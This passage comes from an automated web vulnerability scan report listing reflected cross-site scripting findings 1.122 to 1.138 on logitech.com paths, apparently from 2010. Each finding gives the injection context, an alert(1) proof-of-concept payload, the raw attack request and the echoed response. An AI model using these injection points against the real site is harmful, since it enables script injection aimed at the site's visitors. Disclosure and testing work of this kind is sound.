User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn73b37"><script>alert(1)</script>aa30ad21361">
...[SNIP]...

1.122. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30e09</script><script>alert(1)</script>9011e9a300b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn30e09</script><script>alert(1)</script>9011e9a300b/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn30e09</script><script>alert(1)</script>9011e9a300b' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.123. http://www.logitech.com/css/v2/cmn/global.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/global.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d232e</script><script>alert(1)</script>51d6d4a1ebd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/global.cssd232e</script><script>alert(1)</script>51d6d4a1ebd HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:32 GMT
Connection: keep-alive
Content-Length: 31435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/global.cssd232e</script><script>alert(1)</script>51d6d4a1ebd' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.124. http://www.logitech.com/css/v2/cmn/global.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/global.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50dc6"><script>alert(1)</script>7338e131cc7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/cmn/global.css50dc6"><script>alert(1)</script>7338e131cc7 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:25 GMT
Connection: keep-alive
Content-Length: 31403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/global.css50dc6"><script>alert(1)</script>7338e131cc7">
...[SNIP]...

1.125. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7309b</script><script>alert(1)</script>1ad8e92000f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css7309b</script><script>alert(1)</script>1ad8e92000f/v2/cmn/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css7309b</script><script>alert(1)</script>1ad8e92000f/v2/cmn/navigation' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech
...[SNIP]...

1.126. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 937d4"><script>alert(1)</script>4335ca57442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css937d4"><script>alert(1)</script>4335ca57442/v2/cmn/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css937d4"><script>alert(1)</script>4335ca57442/v2/cmn/navigation">
...[SNIP]...

1.127. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8eec</script><script>alert(1)</script>b6e93325230 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2d8eec</script><script>alert(1)</script>b6e93325230/cmn/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2d8eec</script><script>alert(1)</script>b6e93325230/cmn/navigation' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.co
...[SNIP]...

1.128. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9683"><script>alert(1)</script>63cacfcbc63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2a9683"><script>alert(1)</script>63cacfcbc63/cmn/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2a9683"><script>alert(1)</script>63cacfcbc63/cmn/navigation">
...[SNIP]...

1.129. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c80</script><script>alert(1)</script>51c42a7cc8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn49c80</script><script>alert(1)</script>51c42a7cc8e/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn49c80</script><script>alert(1)</script>51c42a7cc8e/navigation' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,
...[SNIP]...

1.130. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d633"><script>alert(1)</script>622f6629e8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn2d633"><script>alert(1)</script>622f6629e8d/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn2d633"><script>alert(1)</script>622f6629e8d/navigation">
...[SNIP]...

1.131. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef9f"><script>alert(1)</script>ec6502349e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn/navigationeef9f"><script>alert(1)</script>ec6502349e2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/navigationeef9f"><script>alert(1)</script>ec6502349e2">
...[SNIP]...

1.132. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99a20</script><script>alert(1)</script>dde550d6d7a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/navigation99a20</script><script>alert(1)</script>dde550d6d7a/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/navigation99a20</script><script>alert(1)</script>dde550d6d7a' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.133. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96b74"><script>alert(1)</script>044deb99727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css96b74"><script>alert(1)</script>044deb99727/v2/cmn/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css96b74"><script>alert(1)</script>044deb99727/v2/cmn/navigation/bg-nav-headers">
...[SNIP]...

1.134. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be33f</script><script>alert(1)</script>9f6cd5ee0e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssbe33f</script><script>alert(1)</script>9f6cd5ee0e7/v2/cmn/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','cssbe33f</script><script>alert(1)</script>9f6cd5ee0e7/v2/cmn/navigation/bg-nav-headers' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip
...[SNIP]...

1.135. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8352b</script><script>alert(1)</script>b6ca9ac0cdd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v28352b</script><script>alert(1)</script>b6ca9ac0cdd/cmn/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v28352b</script><script>alert(1)</script>b6ca9ac0cdd/cmn/navigation/bg-nav-headers' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','
...[SNIP]...

1.136. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e66a"><script>alert(1)</script>ad553a5b31a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v27e66a"><script>alert(1)</script>ad553a5b31a/cmn/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v27e66a"><script>alert(1)</script>ad553a5b31a/cmn/navigation/bg-nav-headers">
...[SNIP]...

1.137. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2172b</script><script>alert(1)</script>ec6039f9226 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn2172b</script><script>alert(1)</script>ec6039f9226/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn2172b</script><script>alert(1)</script>ec6039f9226/navigation/bg-nav-headers' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.
...[SNIP]...

1.138. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab32f"><script>alert(1)</script>e426beefa42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

